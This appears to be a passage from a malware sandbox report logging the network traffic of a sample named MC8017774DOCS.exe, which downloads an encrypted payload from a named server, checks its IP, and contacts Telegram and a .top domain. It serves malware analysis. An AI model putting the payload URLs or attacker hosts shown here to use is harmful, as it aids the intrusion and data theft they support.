                                                                                                                                                  Nov 25, 2024 07:10:13.854974031 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299191952 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299403906 CET44349862172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.299484968 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:14.300009012 CET49862443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:14.304986000 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.306258917 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.425034046 CET8049858132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.425103903 CET4985880192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.425895929 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:14.425962925 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.426227093 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:14.545658112 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.424850941 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.425348997 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.426281929 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426321983 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:16.426331997 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:16.426394939 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426666975 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:16.426682949 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:17.642055035 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:17.644058943 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:17.644083023 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087543011 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087611914 CET44349871172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.087694883 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:18.095451117 CET49871443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:18.100449085 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.101907969 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.220212936 CET8049866132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.220280886 CET4986680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.221287966 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:18.221379995 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.221563101 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:18.341033936 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.680177927 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.682008982 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682061911 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.682471037 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682791948 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:19.682809114 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:19.721112967 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:20.984571934 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:20.987107038 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:20.987142086 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453036070 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453164101 CET44349882172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.453219891 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:21.453742981 CET49882443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:21.458446980 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.459945917 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.578166962 CET8049877132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.578248024 CET4987780192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.579426050 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:21.579511881 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.579725981 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:21.699167013 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:22.979583025 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.011063099 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011113882 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.011189938 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011502028 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:23.011513948 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:23.033601046 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.267637968 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.270216942 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.270241976 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722225904 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722301960 CET44349890172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.722460985 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.723114967 CET49890443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:24.726216078 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.727279902 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.846170902 CET8049885132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.846327066 CET4988580192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.846823931 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:24.846921921 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.847112894 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:24.966542959 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.655838966 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.657438993 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657495022 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.657569885 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657891035 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:26.657903910 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:26.705472946 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:27.959510088 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:27.961266041 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:27.961304903 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422044992 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422115088 CET44349902172.67.177.134192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.422163963 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:28.423037052 CET49902443192.168.2.6172.67.177.134
                                                                                                                                                  Nov 25, 2024 07:10:28.474313021 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:28.594543934 CET8049896132.226.8.169192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.594620943 CET4989680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:28.613492966 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:28.613533020 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.613610029 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:28.614248037 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:28.614264011 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.277883053 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.277996063 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:30.280361891 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:30.280388117 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.280659914 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.282289982 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:30.327332973 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.799941063 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.800024986 CET44349907149.154.167.220192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:30.800345898 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:30.804508924 CET49907443192.168.2.6149.154.167.220
                                                                                                                                                  Nov 25, 2024 07:10:36.607127905 CET4982680192.168.2.6132.226.8.169
                                                                                                                                                  Nov 25, 2024 07:10:37.648421049 CET4992880192.168.2.65.182.211.149
                                                                                                                                                  Nov 25, 2024 07:10:37.767915010 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:37.768013954 CET4992880192.168.2.65.182.211.149
                                                                                                                                                  Nov 25, 2024 07:10:37.774224997 CET4992880192.168.2.65.182.211.149
                                                                                                                                                  Nov 25, 2024 07:10:37.779309988 CET4992880192.168.2.65.182.211.149
                                                                                                                                                  Nov 25, 2024 07:10:37.893676996 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:37.898782015 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:37.898859024 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:39.098196983 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:39.143002033 CET4992880192.168.2.65.182.211.149
                                                                                                                                                  Nov 25, 2024 07:10:43.918637037 CET80499285.182.211.149192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:43.918709040 CET4992880192.168.2.65.182.211.149

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 25, 2024 07:09:49.646096945 CET5925953192.168.2.61.1.1.1
                                                                                                                                                  Nov 25, 2024 07:09:49.922653913 CET53592591.1.1.1192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.815150976 CET5542853192.168.2.61.1.1.1
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET53554281.1.1.1192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:55.387236118 CET5102853192.168.2.61.1.1.1
                                                                                                                                                  Nov 25, 2024 07:09:55.524797916 CET53510281.1.1.1192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:28.475227118 CET5623553192.168.2.61.1.1.1
                                                                                                                                                  Nov 25, 2024 07:10:28.612538099 CET53562351.1.1.1192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:10:37.034605026 CET5255253192.168.2.61.1.1.1
                                                                                                                                                  Nov 25, 2024 07:10:37.617105961 CET53525521.1.1.1192.168.2.6

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Nov 25, 2024 07:09:49.646096945 CET192.168.2.61.1.1.10x76c5Standard query (0)mertvinc.com.trA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.815150976 CET192.168.2.61.1.1.10x5741Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:55.387236118 CET192.168.2.61.1.1.10xad84Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:10:28.475227118 CET192.168.2.61.1.1.10x2501Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:10:37.034605026 CET192.168.2.61.1.1.10xb3f7Standard query (0)the.drillmmcsnk.topA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Nov 25, 2024 07:09:49.922653913 CET1.1.1.1192.168.2.60x76c5No error (0)mertvinc.com.tr185.244.144.68A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:52.952358007 CET1.1.1.1192.168.2.60x5741No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:55.524797916 CET1.1.1.1192.168.2.60xad84No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:09:55.524797916 CET1.1.1.1192.168.2.60xad84No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:10:28.612538099 CET1.1.1.1192.168.2.60x2501No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 25, 2024 07:10:37.617105961 CET1.1.1.1192.168.2.60xb3f7No error (0)the.drillmmcsnk.top5.182.211.149A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                  • api.telegram.org
                                                                                                                                                  • mertvinc.com.tr
                                                                                                                                                  • checkip.dyndns.org
                                                                                                                                                  • the.drillmmcsnk.top

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.649801185.244.144.68804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:09:50.048825026 CET183OUTGET /pqvBgXvmocLIihvW108.bin HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                  Host: mertvinc.com.tr
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Nov 25, 2024 07:09:51.498241901 CET299INHTTP/1.1 200 OK
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 08:52:07 GMT
                                                                                                                                                  Etag: "32c40-673b0037-3f132ea2915fd050;;;"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 207936
                                                                                                                                                  Date: Mon, 25 Nov 2024 05:16:15 GMT
                                                                                                                                                  Server: LiteSpeed
                                                                                                                                                  X-Powered-By: PleskLin
                                                                                                                                                  Nov 25, 2024 07:09:51.498260021 CET1236INData Raw: 46 62 0e 91 09 b9 db 6a 92 8a 1a 83 48 ab 9b 89 9f de e0 f4 c7 b0 1b 8b ef 03 28 a6 ff 5d 8d 36 d9 1d 77 da a9 b0 c0 a8 02 7b 18 74 ec aa 83 85 71 6e 3e cd f2 f4 1c c9 ce de 49 88 a2 cd 91 37 a5 cf 34 a3 b1 40 60 24 84 57 98 a8 47 e7 e0 c2 95 dd
                                                                                                                                                  Data Ascii: FbjH(]6w{tqn>I74@`$WGf`F?hDbcBLfP@Ks-glQ)Lhcr~wAch&GZC-?c1gkXDlW>rY?qJ$W+7'G&
                                                                                                                                                  Nov 25, 2024 07:09:51.498272896 CET1236INData Raw: e4 81 0c 51 12 ff 46 32 2e 7d d8 11 45 f3 56 85 ea 70 72 40 dc e4 48 57 c9 44 aa 72 ae 67 13 38 61 c7 5a 82 b6 d3 a5 ff 98 5f d4 c0 fe 8d 52 ae 34 2d 07 b4 6d c4 93 75 13 fb c4 5f 84 45 a7 1e c0 fe c5 a0 3a 32 93 a0 68 f0 53 29 d6 5b 44 23 3d aa
                                                                                                                                                  Data Ascii: QF2.}EVpr@HWDrg8aZ_R4-mu_E:2hS)[D#=XFqPhMK<H`N{j&B/Jcu*>$|#~kFYXtv+qxk~CfP35IcBNH]ZYwm~&
                                                                                                                                                  Nov 25, 2024 07:09:51.500376940 CET328INData Raw: 8f 33 5a 71 75 83 5c be 17 66 45 d9 95 70 5f f0 e9 53 95 33 d1 17 e3 3a 00 c2 56 32 83 4c 69 dc c5 2c fe 3d b8 1c 67 8a 73 a7 09 e4 80 4d a9 ae 88 27 03 9c 8b c2 5c af 2e 21 1f 7c 7b 8b 47 17 c8 09 fd e4 6f c0 08 50 d8 dc 54 ce 44 29 54 ad f8 68
                                                                                                                                                  Data Ascii: 3Zqu\fEp_S3:V2Li,=gsM'\.!|{GoPTD)Th*Qp?UPR|'Zm!q*YX%.btjmj^"}Fctq77Q<}z/JdqY{/;D -vuEdw3"z{SkDf
                                                                                                                                                  Nov 25, 2024 07:09:51.603843927 CET1236INData Raw: 7b fe 37 63 76 02 15 ee df 4c 06 d3 15 65 24 64 31 50 e4 4b 2c d7 81 55 83 91 bd 48 a7 9f 44 a0 c6 e1 4d a1 e0 cb f5 ea 7a 85 cc ab 71 15 20 55 e6 5c 3f 30 5e a0 fa e0 9c d4 ce 07 d0 85 5f d9 06 8d ee 8f 25 2b bc 80 67 72 97 62 23 2f e5 21 6b 93
                                                                                                                                                  Data Ascii: {7cvLe$d1PK,UHDMzq U\?0^_%+grb#/!k|T0B]?<>]TP>{}6y=lIm99nvO~rE^I,*fcY18L[G1Ve/\&P_{'N+Rn$
                                                                                                                                                  Nov 25, 2024 07:09:51.603879929 CET1236INData Raw: c5 7f 2a 56 77 6a af 5c dd 11 7e 03 b5 9b d7 13 ef 64 14 be 46 a2 80 50 d0 bb 4d 07 29 c2 a9 c1 96 cf fd 44 16 50 8a 73 db e2 e4 44 0d 05 9f 1a 29 8d d3 e8 ae 7a ce a1 30 9e 51 9a ab 10 6a 5e f3 52 ea 28 0c e5 68 0c e4 6b de 2a 1b ec 56 1f 2f 1b
                                                                                                                                                  Data Ascii: *Vwj\~dFPM)DPsD)z0Qj^R(hk*V/gyR9B%li68>:Kp38W#WE>Dpq6yrk)l`&fwAK(&>V@jV`Zu$X<v-P?`Fvs|Tj44J
                                                                                                                                                  Nov 25, 2024 07:09:51.617614031 CET1236INData Raw: 87 f7 c7 a6 60 a4 11 e3 6e fc 3c a7 cd eb 99 42 b7 1f a6 90 62 86 8d f9 93 38 e6 05 ae 5b 60 5b dd a4 8f ab 2f bf cb ad 66 8e dd 64 fa aa 40 ab a0 14 64 b4 33 23 37 8e 7d 1f 05 28 75 76 44 30 8f 4c 10 a2 68 c3 ee 82 86 ee 62 07 31 23 d0 94 ec 3b
                                                                                                                                                  Data Ascii: `n<Bb8[`[/fd@d3#7}(uvD0Lhb1#;d"E]=iUOr=&*G)_{5&oTv%qS!.9ms9C\=UCNz4MUmp/P-g28MSN\
                                                                                                                                                  Nov 25, 2024 07:09:51.617628098 CET492INData Raw: 40 b7 55 75 ab a0 2b 52 c9 c6 04 1c b7 30 3e fd 22 11 be b6 bf 7b d4 12 fa b7 48 cc e7 bf 56 52 ba 57 3c 74 06 89 e7 b4 74 a2 ae 00 eb 87 bb 1d 93 ee f6 39 fb 3a 9f 0c 9f 41 82 4b 9a 06 7b 83 25 24 6b 90 c4 7b ac 61 e5 c2 03 e8 62 f6 94 21 be 75
                                                                                                                                                  Data Ascii: @Uu+R0>"{HVRW<tt9:AK{%$k{ab!u["[~2H0!,n@v;nQ=5(Z%-Dv5DcmzG(PB(t+j&$!,**VK=P&-SRC("^m,}>
                                                                                                                                                  Nov 25, 2024 07:09:51.619843960 CET1236INData Raw: 44 32 1b 9d d8 86 2d 2d a4 e5 2f e3 9d 9b ec 4a 7f ab 44 5c 1c 97 5d d6 8a 65 9c 27 81 76 39 c9 a1 e1 c8 97 e8 34 1b 6f 7d cb 9d 92 4f 81 cb 93 3a 27 9a 7e d2 29 a7 e4 06 cc 4d d1 4a be ee 33 4a 33 0c 85 27 98 c2 14 d8 74 6c 4a fe 3a 7c 0f 6c 46
                                                                                                                                                  Data Ascii: D2--/JD\]e'v94o}O:'~)MJ3J3'tlJ:|lF0s8UZq>i'nLxpl]*&!\KQKqN}.g\s8#$P]2R[6h>y1 HwK+t
                                                                                                                                                  Nov 25, 2024 07:09:51.723620892 CET1236INData Raw: 5d 68 0f b8 c7 e9 72 04 aa df 16 57 a7 68 21 e7 e3 e4 6b 5c 41 58 15 be 3d 2c 21 aa 1d 0d 8f 2f a3 c9 f6 a8 dd 2f fa 0a fb 26 8f 8b c8 73 a1 b6 0e 76 82 76 f3 de 7f 68 31 c5 32 e7 d5 e5 d0 a0 95 14 c4 f4 8e 09 a7 30 ab 8d 15 ff da cc da a5 04 a7
                                                                                                                                                  Data Ascii: ]hrWh!k\AX=,!//&svvh120k|,]n17_nC:rdOGE|yWva{-M^eYY]cvFFOi2E\@`(b!)%\`uf]7nV?Ah<%we@U|7!x/e52f7{
                                                                                                                                                  Nov 25, 2024 07:09:51.724009037 CET1236INData Raw: 63 8b 61 cd 5a 46 2e ad 3a 4b 0e 4c 66 db 06 e3 c8 1d 71 a5 a9 3e c3 6c 51 a4 55 f7 be 62 c1 b3 aa ad c5 54 98 66 3e 23 e0 0b 02 74 98 85 d7 b5 a1 a6 52 e1 08 b8 75 3f fa 56 0f 52 e6 ff 72 6e 1d 0a bf f3 10 c2 ad ae e2 b4 1f 84 d0 cf ea 56 10 7e
                                                                                                                                                  Data Ascii: caZF.:KLfq>lQUbTf>#tRu?VRrnV~87(lG.b54"O}.Z,[c440[N([-qu*V2o?^T#)1C5=5u*>)HvD-e\BUa.S8|f$`KX"fHz8F52b


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.649808132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:09:53.078775883 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 25, 2024 07:09:54.536580086 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:09:54 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                  Nov 25, 2024 07:09:54.549007893 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Nov 25, 2024 07:09:55.056010008 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:09:54 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                  Nov 25, 2024 07:09:57.234265089 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Nov 25, 2024 07:09:57.739171028 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:09:57 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 103
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.649826132.226.8.169804488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2024 07:09:59.650675058 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Nov 25, 2024 07:10:04.754462004 CET272INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:04 GMT
